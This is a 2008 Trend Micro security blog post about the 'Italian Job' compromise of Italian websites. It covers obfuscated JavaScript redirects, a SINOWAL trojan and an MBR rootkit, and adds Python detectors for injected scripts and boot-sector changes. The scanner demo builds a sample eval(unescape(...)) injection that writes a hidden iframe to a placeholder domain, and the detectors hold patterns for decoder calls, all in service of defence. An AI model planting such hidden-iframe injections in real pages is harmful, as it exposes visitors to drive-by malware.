One Year Later, Italian Job Still Working Overtime

May 2, 2008, by Macky Cruz (Technical Communications)

In what may turn out to be an early one-year “toast” to the June 2007 mass infection that came to be known as the Italian Job, TrendLabs discovered 90 compromised Italian Web sites (all verified active as of this writing) at around 12:30 AM GMT. The compromised sites are varied; their only common thematic link seems to be the Italian language.

According to Trend Micro analysts, the attack rolls out like this:

1. The compromised Web sites contain obfuscated JavaScript code (detected as JS_AFIR.A) that redirects the browser to the malicious URL http://{BLOCKED}r.com/cgi-bin/index.cgi?grb&js=1.

The script checks the Internet Explorer version and the browser language, so it runs only on Italian-language installations.

2. The said URL redirects to another URL: http://{BLOCKED}f.com/cgi-bin/index.cgi?grobin (blocked by Web Reputation Services since April 27).

The two malicious domains were found to be hosted on a single IP address traced back to San Diego, California.

3. The said sites then download TROJ_SINOWAL.CB (detected since April 26 GMT) from the same domain. TROJ_SINOWAL.CB drops BKDR_SINOWAL.CF (detected since April 30 GMT), which in turn drops a rootkit component on the affected PC.

This rootkit component overwrites certain sectors of the infected hard disk, including the Master Boot Record. It also hooks Driver.sys so that read and write requests for those sectors coming from AV/security software are intercepted, protecting the modified sectors from detection and repair.

See the infection diagram below.

SINOWAL malware variants are known information stealer droppers.

As of this writing, TrendLabs has found two forms of this compromise: one is an injected obfuscated script that redirects to the malicious URL described above; the other is a plain, readable iframe pointing at that URL, placed alongside the same obfuscated script.
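As an added example (not part of the original TrendLabs post and not the injected code itself, which the post does not reproduce), the following Python scanner flags both forms described above in a page's HTML: an inline script that combines a decoder call (eval, unescape, String.fromCharCode, document.write) with a dense blob of %XX or \x escape sequences, and an iframe whose src carries the /cgi-bin/index.cgi?grb… path of the first-stage URL. For an obfuscated script it also applies one unescape pass and reports any redirect URL the decoded payload reveals. The sample pages, the placeholder domain stage1-r.invalid and the escape-count and entropy thresholds are constructed for the demonstration.

```python
from __future__ import annotations

import math
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Path pattern taken from the two redirect URLs quoted in the writeup. Their domains are
# redacted there, so the match is on the cgi-bin path and query string only.
REDIRECT_PATH = re.compile(r"/cgi-bin/index\.cgi\?(?:grb|grobin)\b", re.I)
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)

# Calls typically used to unpack and run encoded JavaScript.
DECODER_RE = re.compile(r"\b(?:eval|unescape|String\.fromCharCode|document\.write)\b")
ESCAPE_RE = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}", re.I)


@dataclass(frozen=True)
class Finding:
    kind: str    # "obfuscated_script" | "obfuscated_redirect" | "redirect_iframe"
    detail: str


def shannon_entropy(s: str) -> float:
    """Bits per character; packed or escaped blobs score higher than hand-written JS."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def looks_obfuscated(body: str) -> bool:
    """A decoder call plus either dense escape sequences or high entropy (thresholds assumed)."""
    if not DECODER_RE.search(body):
        return False
    return len(ESCAPE_RE.findall(body)) >= 20 or shannon_entropy(body) > 4.5


def redirect_urls(text: str) -> list[str]:
    return [u for u in URL_RE.findall(text) if REDIRECT_PATH.search(u)]


def scan_page(doc: str) -> list[Finding]:
    """Return one Finding per injected element; an empty list means no indicator fired."""
    findings = []
    for body in SCRIPT_RE.findall(doc):
        if not looks_obfuscated(body):
            continue
        # One unescape pass exposes a %XX-encoded payload like the constructed one below;
        # real samples may need several rounds or a JS interpreter.
        urls = redirect_urls(unquote(body))
        if urls:
            findings.append(Finding("obfuscated_redirect", urls[0]))
        else:
            findings.append(Finding("obfuscated_script", body[:40]))
    for attrs in IFRAME_RE.findall(doc):
        src = SRC_RE.search(attrs)
        if src and REDIRECT_PATH.search(src.group(1)):
            findings.append(Finding("redirect_iframe", src.group(1)))
    return findings


# Constructed samples (not captured content). "stage1-r.invalid" stands in for the
# redacted first-stage domain; the payload is built here so the encoding is exact.
STAGE1_URL = "http://stage1-r.invalid/cgi-bin/index.cgi?grb&js=1"
_PAYLOAD = "".join(
    "%%%02x" % ord(c)
    for c in f"""document.write('<iframe src="{STAGE1_URL}" width=0 height=0></iframe>')""")
INJECTED_SCRIPT = f'<script>eval(unescape("{_PAYLOAD}"));</script>'

CLEAN_PAGE = "<html><body><p>Benvenuti</p><script>var year = 2008;</script></body></html>"
FORM_ONE = f"<html><body><p>Benvenuti</p>{INJECTED_SCRIPT}</body></html>"
FORM_TWO = (f'<html><body><p>Benvenuti</p><iframe src="{STAGE1_URL}" width=0 height=0>'
            f"</iframe>{INJECTED_SCRIPT}</body></html>")

if __name__ == "__main__":
    for name, page in ("clean", CLEAN_PAGE), ("form one", FORM_ONE), ("form two", FORM_TWO):
        print(name, scan_page(page))
```

Run it over a site's files from the hosting account (or over a crawl) and triage anything that fires; the entropy and escape-count thresholds will need tuning against legitimate packed libraries, so treat "obfuscated_script" as a lead and "obfuscated_redirect" or "redirect_iframe" as a confirmed hit.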

It appears that this attack affects sites hosted in Italy by a single hosting provider — the same one that hosted the thousands of sites (mostly travel and leisure) in last year’s large-scale infection. This time, compromised sites include the following:

  • The official site of Monica Bellucci (famous Italian model-actress)
  • The Mercedes-Benz club of Italy
  • The official Web page of Sabrina Salerno (Italian singer)
  • A Johnny Depp fan site
  • A fan site of Pearl Jam

Here are screenshots of the first three sites mentioned above:

[Screenshots: the Monica Bellucci site, the Mercedes-Benz club of Italy site, and the Sabrina Salerno site]

Trend Micro customers are already protected from this threat. Web Threat Protection technology has prevented access to the malicious pages since 27 April 2008. The URLs have also been added to our emergency database and are blocked by WCS (Web Classify Server), making them inaccessible to customers. The RootkitBuster tool is also able to scan for the MBR rootkit component involved in this attack.
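To show what checking the MBR rootkit component described in step 3 involves, here is an added Python example (it is neither RootkitBuster nor code from this post): it parses a 512-byte first sector into a boot-code hash and its partition table, and reports what changed between a known-good copy and a later read. The sample sectors are constructed, and the assumption that the modified MBR keeps its partition table intact while only the boot code differs is mine, chosen so the disk in the demo still boots. The caveat from the text applies to the read itself: with the disk driver hooked, a read issued from inside the infected system passes through the hook and cannot be trusted, so the comparison is only meaningful when the sector is read from boot media or another OS.

```python
import hashlib
import struct
from dataclasses import dataclass

SECTOR = 512
PART_TABLE_OFF = 446          # bytes 0..445 hold the boot code, 446..509 the partition table
BOOT_SIG = b"\x55\xaa"


@dataclass(frozen=True)
class Partition:
    bootable: bool
    type_id: int
    lba_start: int
    sectors: int


@dataclass(frozen=True)
class Mbr:
    boot_code_sha256: str
    partitions: tuple


def parse_mbr(sector: bytes) -> Mbr:
    """Split a 512-byte first sector into a boot-code hash and its non-empty partition entries."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[510:] != BOOT_SIG:
        raise ValueError("missing 0x55AA boot signature")
    parts = []
    for i in range(4):
        entry = sector[PART_TABLE_OFF + 16 * i:PART_TABLE_OFF + 16 * (i + 1)]
        # status, CHS start (3 bytes skipped), type, CHS end (3 bytes skipped), LBA start, count
        status, type_id, lba, count = struct.unpack("<B3xB3xII", entry)
        if type_id:               # an all-zero slot is an unused entry
            parts.append(Partition(status == 0x80, type_id, lba, count))
    return Mbr(hashlib.sha256(sector[:PART_TABLE_OFF]).hexdigest(), tuple(parts))


def compare_mbr(baseline: bytes, current: bytes) -> list:
    """List the differences between a known-good MBR and a later read (empty list = unchanged)."""
    old, new = parse_mbr(baseline), parse_mbr(current)
    diffs = []
    if old.partitions != new.partitions:
        diffs.append("partition table changed")
    if old.boot_code_sha256 != new.boot_code_sha256:
        diffs.append("boot code changed: %s -> %s"
                     % (old.boot_code_sha256[:12], new.boot_code_sha256[:12]))
    return diffs


def read_mbr(device: str) -> bytes:
    """Read the first sector of a raw device such as /dev/sda or \\\\.\\PhysicalDrive0.
    Only trustworthy when the OS doing the read is not the infected one."""
    with open(device, "rb") as f:
        return f.read(SECTOR)


def make_mbr(boot_code: bytes, partitions) -> bytes:
    """Assemble a constructed MBR for the demo (not a real disk image)."""
    if len(boot_code) > PART_TABLE_OFF:
        raise ValueError("boot code too long")
    table = b"".join(struct.pack("<B3xB3xII", 0x80 if bootable else 0, type_id, lba, count)
                     for bootable, type_id, lba, count in partitions)
    return boot_code.ljust(PART_TABLE_OFF, b"\x00") + table.ljust(64, b"\x00") + BOOT_SIG


# Constructed samples: a stock-looking boot sector with one bootable NTFS partition, and the
# same sector with only the boot code replaced. Leaving the partition table intact is an
# assumption of this demo, not a claim taken from the post.
PARTITIONS = [(True, 0x07, 63, 1_000_000)]
CLEAN_MBR = make_mbr(b"\x33\xc0\x8e\xd0\xbc\x00\x7c\x8e\xc0\x8e\xd8", PARTITIONS)
MODIFIED_MBR = make_mbr(b"\xea\x00\x7c\x00\x00\x90\x90\x90", PARTITIONS)

if __name__ == "__main__":
    print("clean vs clean:   ", compare_mbr(CLEAN_MBR, CLEAN_MBR))
    print("clean vs modified:", compare_mbr(CLEAN_MBR, MODIFIED_MBR))
```

In practice the baseline hash comes from a read taken at deployment time or from a clean boot medium; a boot-code change with an unchanged partition table is exactly the case that an in-system scan can miss, which is why the read must bypass the running OS.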

Last updated at 5:27 PM GMT, 3 May 2008




One Response to “One Year Later, Italian Job Still Working Overtime”

  1. Hacker attack on our hosting service « CssGlance - Css gallery, examples and webdesign resources Says:

    [...] the javascripts included in our website. To ensure the safety of your PC, please have a look at the article on the TrendLabs website and use the following tools to scan your computer and check if it has been [...]



© Copyright 2008 Trend Micro Inc. All rights reserved.